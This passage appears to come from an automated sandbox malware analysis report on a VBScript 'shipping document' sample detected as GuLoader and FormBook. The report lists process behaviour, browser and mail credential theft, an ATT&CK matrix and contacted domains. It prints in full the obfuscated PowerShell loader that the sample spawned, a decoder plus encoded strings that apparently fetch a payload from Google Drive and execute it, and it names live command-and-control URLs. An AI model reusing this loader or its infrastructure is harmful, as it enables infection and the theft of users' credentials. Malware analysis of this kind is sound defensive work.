.krieprotopterroacoyotimovabnbej,st p
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. .lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st pJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ricki = 1;$gehenna='substrin';$gehenna+='g';function quillaia($overbevokser){$feasibilities=$overbevokser.length-$ricki;for($kompeni=5; $kompeni -lt $feasibilities; $kompeni+=(6)){$fortrnelse+=$overbevokser.$gehenna.invoke($kompeni, $ricki);}$fortrnelse;}function standglas249($babbittess){. ($uti) ($babbittess);}$usheen=quillaia ' s.bcm autoo,roomza,uatipreenludspil emieam.cov/toakt5ethno. org,0kille het,r(egetfw selvinedrunst nidva.ieogunvaw brugsisbje propentidsftagter stdta1scale0ma em.spu.g0rensn;a ver b,dedwurpr,iwoundn sprn6hex n4sub,e; c.to az.mexsvine6k evr4 non.;perso viruera,tndv han,:store1 horo2f ret1 oeme. opti0inten)skerr forkrgsept,eselebc histkle,lio as,r/ inhe2tailz0efter1.ndos0.euro0overb1bund 0,arav1ore,t operfl.udai sprursto,ve,traafslavio,earax .hot/ udsu1 eger2 me.l1krabd.spinu0maedt ';$bogholdersker=quillaia 'forbiuoscilsadr.segangwrbevat- h,ldatheurgpi kyesemidnkrilrt ly p ';$fint=quillaia 'nondihblockt reintetmaapinsers indf:inter/defo /t pvodfryserun acitilb vsysseeexecr.kurs gberr oadfrdo loo.ginconlaf alegabes. .lotc ant o succmgodhj/termoumoun.ctermo?maletefo,grxno.cupinconocensur.ejebtbarra=apraxd pulvocohenwhan.knhol bl i.frocaseaahyr,sdpol r&ar,npitrichdbestr= gar,1unmo oarbejd fugtjlsead9univei po,c8subbabfilat8 egngbrnefdfu,le7adspu4bordvvar.hdu ockac.abenogamel_samme0tiltrm paynaarb.taf.rrerskulkxunmussvildfoan,ipzsmithj korre l,efisu.pknu derbnucul5 burm ';$observandernes=quillaia ' gna >stand ';$uti=quillaia 'dialaim,ddeepr.dexnonex ';$akkumulerede = quillaia 'skaffenar,ocdatamhcathoou,ali fanem%medisaretsgpalligpejersd ,maaaindsttkomb a meta%u,all\ loenfwagneitraktntys,li pillnginesd forssisoagt el viove slfrilslarsh,iretran kursgteksteprokurunifan prece,eklasud,ap1wa,py1b tte9 dext.arikou outpnafkaliideal ne,tb&f,rbi&flamm ozaeefiresc st,chfiguro lede illog$ulovm ';standglas249 (quillaia ' cent$amidog .lukly,ereogarnibretrtan,nirludate:org.nr echrerekinspreapikonjaghe nenma.emehogmorslagte,appanpomeld.senseegn,rsin,ri=ndraa( natucf,jtimkunstd bvre kants/ un,oc fic, yemen$ stv,akravektnneskkombiufidusmlejrsucardiltrykkeminj raccoueskrivd doupearoma)pal,o ');standglas249 (quillaia ' mask$admirg r.shlquarto unrib s.deadansel fork: nummpreachrglazef m.llavalgrbdiphtrgenkeil.viskunsenevugger,rnne=learn$jernbfchallikhevznudsigtskull. hresswolffp un,rl ubndistjertma,ri(tapet$do,laorringb ge,ts.nasseak,usrrvhulvpanoraynglen recldfremfezernerpsychn almueu.loosdispe)ermel ');$fint=$prfabriker[0];standglas249 (quillaia ' akti$actingunderljackpo fidgb optiap mphl pira: baanr mde.ehejreptilsla lejei skelnove,dtuncomecasanrderivseti.l=flskenvo ubenoncuw ho n- methovoldgbef erjthyr,esen ocbin.itextra s.cers egnsy ide,sforkathyrevemot vmchaut. udslnbro zehollytjuv l.gvestw ecome brofbunloocincarl udbyifreere,aglynspdbrtudvik ');standglas249 (quillaia 'psal.$,avshr .krieprotopterroacoyotimovabnbej,st pJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information321
        Scripting        		Valid Accounts11
        Windows Management Instrumentation        		321
        Scripting        		1
        Abuse Elevation Control Mechanism        		1
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		1
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory14
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter        		11
        Registry Run Keys / Startup Folder        		411
        Process Injection        		3
        Obfuscated Files or Information        		Security Account Manager1
        Query Registry        		SMB/Windows Admin Shares1
        Email Collection        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login Hook11
        Registry Run Keys / Startup Folder        		1
        Software Packing        		NTDS21
        Security Software Discovery        		Distributed Component Object ModelInput Capture5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets1
        Process Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading        		Cached Domain Credentials41
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
        Virtualization/Sandbox Evasion        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
        Process Injection        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Rundll32        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430120 Sample: shipping document.vbs Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 53 www.ordinarythoughts.org 2->53 55 www.mz3fk6g3.sbs 2->55 57 4 other IPs or domains 2->57 71 Snort IDS alert for network traffic 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Antivirus detection for URL or domain 2->75 77 7 other signatures 2->77 12 wscript.exe 1 2->12         started        15 wab.exe 1 2->15         started        17 wab.exe 3 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 93 VBScript performs obfuscated calls to suspicious functions 12->93 95 Suspicious powershell command line found 12->95 97 Wscript starts Powershell (via cmd or directly) 12->97 99 3 other signatures 12->99 21 powershell.exe 14 19 12->21         started        25 WmiPrvSE.exe 12->25         started        process6 dnsIp7 59 drive.usercontent.google.com 142.251.35.161, 443, 49707, 49716 GOOGLEUS United States 21->59 61 drive.google.com 142.251.41.14, 443, 49706, 49715 GOOGLEUS United States 21->61 79 Suspicious powershell command line found 21->79 81 Very long command line found 21->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 21->83 27 powershell.exe 17 21->27         started        30 conhost.exe 21->30         started        32 cmd.exe 1 21->32         started        signatures8 process9 signatures10 89 Writes to foreign memory regions 27->89 91 Found suspicious powershell code related to unpacking or dynamic code loading 27->91 34 wab.exe 6 27->34         started        37 cmd.exe 1 27->37         started        39 wab.exe 27->39         started        process11 signatures12 69 Maps a DLL or memory area into another process 34->69 41 NJeXDhPqkKUqTApfiOc.exe 34->41 injected process13 signatures14 85 Maps a DLL or memory area into another process 41->85 87 Found direct / indirect Syscall (likely to bypass EDR) 41->87 44 openfiles.exe 1 13 41->44         started        process15 signatures16 101 Tries to steal Mail credentials (via file / registry access) 44->101 103 Creates autostart registry keys with suspicious names 44->103 105 Tries to harvest and steal browser information (history, passwords, etc) 44->105 107 3 other signatures 44->107 47 NJeXDhPqkKUqTApfiOc.exe 44->47 injected 51 firefox.exe 44->51         started        process17 dnsIp18 63 www.a-two-spa-salon.com 157.7.107.63, 49720, 49721, 49722 INTERQGMOInternetIncJP Japan 47->63 65 www.jthzbrdb.fun 80.240.20.220, 49719, 80 AS-CHOOPAUS Germany 47->65 67 Found direct / indirect Syscall (likely to bypass EDR) 47->67 signatures19

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        shipping document.vbs32%ReversingLabsScript-WScript.Trojan.Guloader
        shipping document.vbs40%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        www.a-two-spa-salon.com0%VirustotalBrowse
        www.jthzbrdb.fun3%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        https://go.micro0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://www.microsoft.0%URL Reputationsafe
        http://www.microsoft.0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.a-two-spa-salon.com
        		157.7.107.63
        		truetrueunknown
        drive.google.com
        		142.251.41.14
        		truefalse
          		high
          drive.usercontent.google.com
          		142.251.35.161
          		truefalse
            		high
            www.mz3fk6g3.sbs
            		172.217.16.36
            		truetrue
              		unknown
              www.jthzbrdb.fun
              		80.240.20.220
              		truetrueunknown
              www.ordinarythoughts.org
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.jthzbrdb.fun/3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg==true
                  		unknown
                  http://www.a-two-spa-salon.com/3g97/true
                    		unknown
                    http://www.a-two-spa-salon.com/3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6true
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://drive.usercontent.google.compowershell.exe, 00000003.00000002.1987110176.000001FCDF34C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007099000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000003.00000002.1987110176.000001FCDE9B9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://drive.googPpowershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://drive.usercontent.googhpowershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://www.microsoft.powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://drive.google.compowershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.microsoft.ps/Docs/Repository.htm0powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://hostname.domain.tld/firefox.exe, 00000015.00000002.2537345110.000000002C054000.00000004.80000000.00040000.00000000.sdmpfalse
                                        		unknown
                                        https://www.google.compowershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://aka.ms/pscore6lBpowershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.google.compowershell.exe, 00000003.00000002.1987110176.000001FCDD787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://drive.usercontent.google.compowershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDD9EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://aka.ms/pscore68powershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
